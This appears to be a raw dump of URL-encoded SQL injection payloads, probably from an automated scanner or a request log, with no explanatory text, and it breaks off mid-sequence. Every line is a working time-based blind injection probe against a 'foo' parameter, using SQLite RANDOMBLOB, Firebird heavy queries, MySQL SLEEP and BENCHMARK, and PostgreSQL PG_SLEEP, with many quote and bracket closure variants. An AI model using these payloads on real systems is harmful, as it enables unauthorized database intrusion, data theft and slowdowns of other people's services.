foo%27%29%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%28%28%28%27jfxC%27%20LIKE%20%27jfxC foo%27%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%27fCIm%27%20LIKE%20%27fCIm foo%22%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%28%22cuaM%22%3D%22cuaM foo%22%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%28%28%22zZnf%22%3D%22zZnf foo%22%29%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%28%28%28%22OXVM%22%3D%22OXVM foo%22%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%22sEFo%22%3D%22sEFo foo%22%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%28%22TvTy%22%20LIKE%20%22TvTy foo%22%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%28%28%22yafJ%22%20LIKE%20%22yafJ foo%22%29%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%28%28%28%22RDBS%22%20LIKE%20%22RDBS foo%22%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20AND%20%22OerU%22%20LIKE%20%22OerU foo%29%20WHERE%206667%3D6667%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B-- foo%27%29%20WHERE%201799%3D1799%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B-- foo%27%20WHERE%206630%3D6630%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B-- foo%22%20WHERE%207500%3D7500%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B-- foo%27%20%7C%7C%20%28SELECT%202011%20FROM%20DUAL%20WHERE%206833%3D6833%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%202125%20WHERE%209884%3D9884%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%204444%20FROM%20DUAL%20WHERE%203250%3D3250%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20%29 foo%20%2B%20%28SELECT%204868%20WHERE%206383%3D6383%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20%29 foo%27%20%2B%20%28SELECT%20%27ibXG%27%20FROM%20DUAL%20WHERE%201140%3D1140%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27leoS%27%20WHERE%204962%3D4962%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%3B--%20%23 foo%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B-- foo%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B-- foo%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B-- foo%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B-- foo%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%284065%3D4065 foo%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%28%286921%3D6921 foo%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%28%28%284721%3D4721 foo%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B-- foo%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%28%27Mzdd%27%3D%27Mzdd foo%27%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%28%28%27jlGo%27%3D%27jlGo foo%27%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%28%28%28%27Kcds%27%3D%27Kcds foo%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%27KZVc%27%3D%27KZVc foo%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%28%27kBNk%27%20LIKE%20%27kBNk foo%27%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%28%28%27ZfoM%27%20LIKE%20%27ZfoM foo%27%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%28%28%28%27NHZS%27%20LIKE%20%27NHZS foo%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%27jKAo%27%20LIKE%20%27jKAo foo%22%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%28%22eQDG%22%3D%22eQDG foo%22%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%28%28%22xYBq%22%3D%22xYBq foo%22%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%28%28%28%22ROGR%22%3D%22ROGR foo%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%22oFjO%22%3D%22oFjO foo%22%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%28%22PnNJ%22%20LIKE%20%22PnNJ foo%22%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%28%28%22VzsU%22%20LIKE%20%22VzsU foo%22%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%28%28%28%22zYjd%22%20LIKE%20%22zYjd foo%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20AND%20%22nWoM%22%20LIKE%20%22nWoM foo%29%20WHERE%208490%3D8490%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B-- foo%27%29%20WHERE%209634%3D9634%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B-- foo%27%20WHERE%209264%3D9264%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B-- foo%22%20WHERE%202642%3D2642%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B-- foo%27%20%7C%7C%20%28SELECT%202962%20FROM%20DUAL%20WHERE%207058%3D7058%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%207558%20WHERE%202743%3D2743%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%206357%20FROM%20DUAL%20WHERE%203262%3D3262%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20%29 foo%20%2B%20%28SELECT%206057%20WHERE%203877%3D3877%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20%29 foo%27%20%2B%20%28SELECT%20%27WsEN%27%20FROM%20DUAL%20WHERE%202597%3D2597%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27csqA%27%20WHERE%204230%3D4230%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--%20%23 foo%29%20AND%20SLEEP%285%29 foo%27%29%20AND%20SLEEP%285%29 foo%27%20AND%20SLEEP%285%29 foo%22%20AND%20SLEEP%285%29 foo%29%20AND%20SLEEP%285%29%20AND%20%284973%3D4973 foo%29%29%20AND%20SLEEP%285%29%20AND%20%28%283908%3D3908 foo%29%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%284616%3D4616 foo%20AND%20SLEEP%285%29 foo%27%29%20AND%20SLEEP%285%29%20AND%20%28%27BPDI%27%3D%27BPDI foo%27%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%27YuLj%27%3D%27YuLj foo%27%29%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%28%27mJmi%27%3D%27mJmi foo%27%20AND%20SLEEP%285%29%20AND%20%27lgqQ%27%3D%27lgqQ foo%27%29%20AND%20SLEEP%285%29%20AND%20%28%27uirP%27%20LIKE%20%27uirP foo%27%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%27rjOl%27%20LIKE%20%27rjOl foo%27%29%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%28%27HTJr%27%20LIKE%20%27HTJr foo%27%20AND%20SLEEP%285%29%20AND%20%27gbKE%27%20LIKE%20%27gbKE foo%22%29%20AND%20SLEEP%285%29%20AND%20%28%22sYom%22%3D%22sYom foo%22%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%22HXpp%22%3D%22HXpp foo%22%29%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%28%22RClM%22%3D%22RClM foo%22%20AND%20SLEEP%285%29%20AND%20%22cPFa%22%3D%22cPFa foo%22%29%20AND%20SLEEP%285%29%20AND%20%28%22zgqU%22%20LIKE%20%22zgqU foo%22%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%22ESsp%22%20LIKE%20%22ESsp foo%22%29%29%29%20AND%20SLEEP%285%29%20AND%20%28%28%28%22ritD%22%20LIKE%20%22ritD foo%22%20AND%20SLEEP%285%29%20AND%20%22seuw%22%20LIKE%20%22seuw foo%29%20WHERE%207494%3D7494%20AND%20SLEEP%285%29 foo%27%29%20WHERE%209899%3D9899%20AND%20SLEEP%285%29 foo%27%20WHERE%203897%3D3897%20AND%20SLEEP%285%29 foo%22%20WHERE%204228%3D4228%20AND%20SLEEP%285%29 foo%27%20%7C%7C%20%28SELECT%202151%20FROM%20DUAL%20WHERE%204304%3D4304%20AND%20SLEEP%285%29%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%203703%20WHERE%203675%3D3675%20AND%20SLEEP%285%29%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%205028%20FROM%20DUAL%20WHERE%201633%3D1633%20AND%20SLEEP%285%29%20%29 foo%20%2B%20%28SELECT%207876%20WHERE%205397%3D5397%20AND%20SLEEP%285%29%20%29 foo%27%20%2B%20%28SELECT%20%27gtwG%27%20FROM%20DUAL%20WHERE%209758%3D9758%20AND%20SLEEP%285%29%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27wdVY%27%20WHERE%201524%3D1524%20AND%20SLEEP%285%29%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%20SLEEP%285%29%20%23 foo%29%20AND%20SLEEP%285%29%23 foo%27%29%20AND%20SLEEP%285%29%23 foo%27%20AND%20SLEEP%285%29%23 foo%22%20AND%20SLEEP%285%29%23 foo%29%20AND%20SLEEP%285%29%23%20AND%20%285616%3D5616 foo%29%29%20AND%20SLEEP%285%29%23%20AND%20%28%288644%3D8644 foo%29%29%29%20AND%20SLEEP%285%29%23%20AND%20%28%28%287160%3D7160 foo%20AND%20SLEEP%285%29%23 foo%27%29%20AND%20SLEEP%285%29%23%20AND%20%28%27yTip%27%3D%27yTip foo%27%29%29%20AND%20SLEEP%285%29%23%20AND%20%28%28%27olmk%27%3D%27olmk foo%27%29%29%29%20AND%20SLEEP%285%29%23%20AND%20%28%28%28%27HDiB%27%3D%27HDiB foo%27%20AND%20SLEEP%285%29%23%20AND%20%27WlTg%27%3D%27WlTg foo%27%29%20AND%20SLEEP%285%29%23%20AND%20%28%27LyYl%27%20LIKE%20%27LyYl foo%27%29%29%20AND%20SLEEP%285%29%23%20AND%20%28%28%27GKZJ%27%20LIKE%20%27GKZJ foo%27%29%29%29%20AND%20SLEEP%285%29%23%20AND%20%28%28%28%27XZKb%27%20LIKE%20%27XZKb foo%27%20AND%20SLEEP%285%29%23%20AND%20%27hXMJ%27%20LIKE%20%27hXMJ foo%22%29%20AND%20SLEEP%285%29%23%20AND%20%28%22Yttq%22%3D%22Yttq foo%22%29%29%20AND%20SLEEP%285%29%23%20AND%20%28%28%22ZLIs%22%3D%22ZLIs foo%22%29%29%29%20AND%20SLEEP%285%29%23%20AND%20%28%28%28%22ephO%22%3D%22ephO foo%22%20AND%20SLEEP%285%29%23%20AND%20%22Zbqj%22%3D%22Zbqj foo%22%29%20AND%20SLEEP%285%29%23%20AND%20%28%22RJap%22%20LIKE%20%22RJap foo%22%29%29%20AND%20SLEEP%285%29%23%20AND%20%28%28%22DEKX%22%20LIKE%20%22DEKX foo%22%29%29%29%20AND%20SLEEP%285%29%23%20AND%20%28%28%28%22PYWG%22%20LIKE%20%22PYWG foo%22%20AND%20SLEEP%285%29%23%20AND%20%22bTYZ%22%20LIKE%20%22bTYZ foo%29%20WHERE%208207%3D8207%20AND%20SLEEP%285%29%23 foo%27%29%20WHERE%204879%3D4879%20AND%20SLEEP%285%29%23 foo%27%20WHERE%202445%3D2445%20AND%20SLEEP%285%29%23 foo%22%20WHERE%204498%3D4498%20AND%20SLEEP%285%29%23 foo%27%20%7C%7C%20%28SELECT%202972%20FROM%20DUAL%20WHERE%203581%3D3581%20AND%20SLEEP%285%29%23%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%202972%20FROM%20DUAL%20WHERE%203581%3D3581%20AND%20SLEEP%285%29%23%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%208653%20WHERE%207659%3D7659%20AND%20SLEEP%285%29%23%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%205703%20FROM%20DUAL%20WHERE%204347%3D4347%20AND%20SLEEP%285%29%23%20%29 foo%20%2B%20%28SELECT%207462%20WHERE%205975%3D5975%20AND%20SLEEP%285%29%23%20%29 foo%27%20%2B%20%28SELECT%20%27tBod%27%20FROM%20DUAL%20WHERE%206765%3D6765%20AND%20SLEEP%285%29%23%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27qRam%27%20WHERE%209814%3D9814%20AND%20SLEEP%285%29%23%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%20SLEEP%285%29%23%20%23 foo%29%20AND%205505%3DBENCHMARK%285000000%2CMD5%280x76615253%29%29 foo%27%29%20AND%205505%3DBENCHMARK%285000000%2CMD5%280x76615253%29%29 foo%27%20AND%205505%3DBENCHMARK%285000000%2CMD5%280x76615253%29%29 foo%22%20AND%205505%3DBENCHMARK%285000000%2CMD5%280x76615253%29%29 foo%29%20AND%205505%3DBENCHMARK%285000000%2CMD5%280x76615253%29%29%20AND%20%287973%3D7973 foo%29%29%20AND%205505%3DBENCHMARK%285000000%2CMD5%280x76615253%29%29%20AND%20%28%281287%3D1287 foo%29%29%29%20AND%205505%3DBENCHMARK%285000000%2CMD5%280x76615253%29%29%20AND%20%28%28%282864%3D2864 foo%20AND%205505%3DBENCHMARK%285000000%2CMD5%280x76615253%29%29 foo%27%29%20AND%205505%3DBENCHMARK%285000000%2CMD5%280x76615253%29%29%20AND%20%28%27lkLf%27%3D%27lkLf foo%27%29%29%20AND%205505%3DBENCHMARK%285000000%2CMD5%280x76615253%29%29%20AND%20%28%28%27XiQV%27%3D%27XiQV foo%27%29%29%29%20AND%205505%3DBENCHMARK%285000000%2CMD5%280x76615253%29%29%20AND%20%28%28%28%27qtgO%27%3D%27qtgO foo%27%20AND%205505%3DBENCHMARK%285000000%2CMD5%280x76615253%29%29%20AND%20%27Hlih%27%3D%27Hlih foo%27%29%20AND%205505%3DBENCHMARK%285000000%2CMD5%280x76615253%29%29%20AND%20%28%27QvcU%27%20LIKE%20%27QvcU foo%27%29%29%20AND%205505%3DBENCHMARK%285000000%2CMD5%280x76615253%29%29%20AND%20%28%28%27qxco%27%20LIKE%20%27qxco foo%27%29%29%29%20AND%205505%3DBENCHMARK%285000000%2CMD5%280x76615253%29%29%20AND%20%28%28%28%27JCAJ%27%20LIKE%20%27JCAJ foo%27%20AND%205505%3DBENCHMARK%285000000%2CMD5%280x76615253%29%29%20AND%20%27GwXh%27%20LIKE%20%27GwXh foo%22%29%20AND%205505%3DBENCHMARK%285000000%2CMD5%280x76615253%29%29%20AND%20%28%22XBsW%22%3D%22XBsW foo%22%29%29%20AND%205505%3DBENCHMARK%285000000%2CMD5%280x76615253%29%29%20AND%20%28%28%22cpkP%22%3D%22cpkP foo%22%29%29%29%20AND%205505%3DBENCHMARK%285000000%2CMD5%280x76615253%29%29%20AND%20%28%28%28%22Emgv%22%3D%22Emgv foo%22%20AND%205505%3DBENCHMARK%285000000%2CMD5%280x76615253%29%29%20AND%20%22lttI%22%3D%22lttI foo%22%29%20AND%205505%3DBENCHMARK%285000000%2CMD5%280x76615253%29%29%20AND%20%28%22johA%22%20LIKE%20%22johA foo%22%29%29%20AND%205505%3DBENCHMARK%285000000%2CMD5%280x76615253%29%29%20AND%20%28%28%22QDMP%22%20LIKE%20%22QDMP foo%22%29%29%29%20AND%205505%3DBENCHMARK%285000000%2CMD5%280x76615253%29%29%20AND%20%28%28%28%22CQsY%22%20LIKE%20%22CQsY foo%22%20AND%205505%3DBENCHMARK%285000000%2CMD5%280x76615253%29%29%20AND%20%22VcnG%22%20LIKE%20%22VcnG foo%29%20WHERE%205769%3D5769%20AND%205505%3DBENCHMARK%285000000%2CMD5%280x76615253%29%29 foo%27%29%20WHERE%201341%3D1341%20AND%205505%3DBENCHMARK%285000000%2CMD5%280x76615253%29%29 foo%27%20WHERE%203900%3D3900%20AND%205505%3DBENCHMARK%285000000%2CMD5%280x76615253%29%29 foo%22%20WHERE%205626%3D5626%20AND%205505%3DBENCHMARK%285000000%2CMD5%280x76615253%29%29 foo%27%20%7C%7C%20%28SELECT%202750%20FROM%20DUAL%20WHERE%205288%3D5288%20AND%205505%3DBENCHMARK%285000000%2CMD5%280x76615253%29%29%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%207456%20WHERE%209269%3D9269%20AND%205505%3DBENCHMARK%285000000%2CMD5%280x76615253%29%29%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%207034%20FROM%20DUAL%20WHERE%204978%3D4978%20AND%205505%3DBENCHMARK%285000000%2CMD5%280x76615253%29%29%20%29 foo%20%2B%20%28SELECT%204835%20WHERE%209904%3D9904%20AND%205505%3DBENCHMARK%285000000%2CMD5%280x76615253%29%29%20%29 foo%27%20%2B%20%28SELECT%20%27qpVR%27%20FROM%20DUAL%20WHERE%208773%3D8773%20AND%205505%3DBENCHMARK%285000000%2CMD5%280x76615253%29%29%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27TReT%27%20WHERE%209419%3D9419%20AND%205505%3DBENCHMARK%285000000%2CMD5%280x76615253%29%29%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%205505%3DBENCHMARK%285000000%2CMD5%280x76615253%29%29%20%23 foo%29%20AND%203496%3DBENCHMARK%285000000%2CMD5%280x78504766%29%29%23 foo%27%29%20AND%203496%3DBENCHMARK%285000000%2CMD5%280x78504766%29%29%23 foo%27%20AND%203496%3DBENCHMARK%285000000%2CMD5%280x78504766%29%29%23 foo%22%20AND%203496%3DBENCHMARK%285000000%2CMD5%280x78504766%29%29%23 foo%29%20AND%203496%3DBENCHMARK%285000000%2CMD5%280x78504766%29%29%23%20AND%20%286208%3D6208 foo%29%29%20AND%203496%3DBENCHMARK%285000000%2CMD5%280x78504766%29%29%23%20AND%20%28%288522%3D8522 foo%29%29%29%20AND%203496%3DBENCHMARK%285000000%2CMD5%280x78504766%29%29%23%20AND%20%28%28%282362%3D2362 foo%20AND%203496%3DBENCHMARK%285000000%2CMD5%280x78504766%29%29%23 foo%27%29%20AND%203496%3DBENCHMARK%285000000%2CMD5%280x78504766%29%29%23%20AND%20%28%27CzzW%27%3D%27CzzW foo%27%29%29%20AND%203496%3DBENCHMARK%285000000%2CMD5%280x78504766%29%29%23%20AND%20%28%28%27IYxW%27%3D%27IYxW foo%27%29%29%29%20AND%203496%3DBENCHMARK%285000000%2CMD5%280x78504766%29%29%23%20AND%20%28%28%28%27Dmeb%27%3D%27Dmeb foo%27%20AND%203496%3DBENCHMARK%285000000%2CMD5%280x78504766%29%29%23%20AND%20%27NOGO%27%3D%27NOGO foo%27%29%20AND%203496%3DBENCHMARK%285000000%2CMD5%280x78504766%29%29%23%20AND%20%28%27HPcM%27%20LIKE%20%27HPcM foo%27%29%29%20AND%203496%3DBENCHMARK%285000000%2CMD5%280x78504766%29%29%23%20AND%20%28%28%27Arfv%27%20LIKE%20%27Arfv foo%27%29%29%29%20AND%203496%3DBENCHMARK%285000000%2CMD5%280x78504766%29%29%23%20AND%20%28%28%28%27mWFl%27%20LIKE%20%27mWFl foo%27%20AND%203496%3DBENCHMARK%285000000%2CMD5%280x78504766%29%29%23%20AND%20%27eUIo%27%20LIKE%20%27eUIo foo%22%29%20AND%203496%3DBENCHMARK%285000000%2CMD5%280x78504766%29%29%23%20AND%20%28%22PuhH%22%3D%22PuhH foo%22%29%29%20AND%203496%3DBENCHMARK%285000000%2CMD5%280x78504766%29%29%23%20AND%20%28%28%22evpY%22%3D%22evpY foo%22%29%29%29%20AND%203496%3DBENCHMARK%285000000%2CMD5%280x78504766%29%29%23%20AND%20%28%28%28%22lLPo%22%3D%22lLPo foo%22%20AND%203496%3DBENCHMARK%285000000%2CMD5%280x78504766%29%29%23%20AND%20%22FDah%22%3D%22FDah foo%22%29%20AND%203496%3DBENCHMARK%285000000%2CMD5%280x78504766%29%29%23%20AND%20%28%22ZjSg%22%20LIKE%20%22ZjSg foo%22%29%29%20AND%203496%3DBENCHMARK%285000000%2CMD5%280x78504766%29%29%23%20AND%20%28%28%22YTmy%22%20LIKE%20%22YTmy foo%22%29%29%29%20AND%203496%3DBENCHMARK%285000000%2CMD5%280x78504766%29%29%23%20AND%20%28%28%28%22sGji%22%20LIKE%20%22sGji foo%22%20AND%203496%3DBENCHMARK%285000000%2CMD5%280x78504766%29%29%23%20AND%20%22CuAK%22%20LIKE%20%22CuAK foo%29%20WHERE%202902%3D2902%20AND%203496%3DBENCHMARK%285000000%2CMD5%280x78504766%29%29%23 foo%27%29%20WHERE%206656%3D6656%20AND%203496%3DBENCHMARK%285000000%2CMD5%280x78504766%29%29%23 foo%27%20WHERE%204791%3D4791%20AND%203496%3DBENCHMARK%285000000%2CMD5%280x78504766%29%29%23 foo%22%20WHERE%207058%3D7058%20AND%203496%3DBENCHMARK%285000000%2CMD5%280x78504766%29%29%23 foo%27%20%7C%7C%20%28SELECT%203641%20FROM%20DUAL%20WHERE%208981%3D8981%20AND%203496%3DBENCHMARK%285000000%2CMD5%280x78504766%29%29%23%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%205674%20WHERE%209901%3D9901%20AND%203496%3DBENCHMARK%285000000%2CMD5%280x78504766%29%29%23%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%204942%20FROM%20DUAL%20WHERE%209760%3D9760%20AND%203496%3DBENCHMARK%285000000%2CMD5%280x78504766%29%29%23%20%29 foo%20%2B%20%28SELECT%207905%20WHERE%207799%3D7799%20AND%203496%3DBENCHMARK%285000000%2CMD5%280x78504766%29%29%23%20%29 foo%27%20%2B%20%28SELECT%20%27NBKE%27%20FROM%20DUAL%20WHERE%208824%3D8824%20AND%203496%3DBENCHMARK%285000000%2CMD5%280x78504766%29%29%23%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27cyGl%27%20WHERE%209349%3D9349%20AND%203496%3DBENCHMARK%285000000%2CMD5%280x78504766%29%29%23%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%203496%3DBENCHMARK%285000000%2CMD5%280x78504766%29%29%23%20%23 foo%29%20AND%209126%3D%28SELECT%209126%20FROM%20PG_SLEEP%285%29%29 foo%27%29%20AND%209126%3D%28SELECT%209126%20FROM%20PG_SLEEP%285%29%29 foo%27%20AND%209126%3D%28SELECT%209126%20FROM%20PG_SLEEP%285%29%29 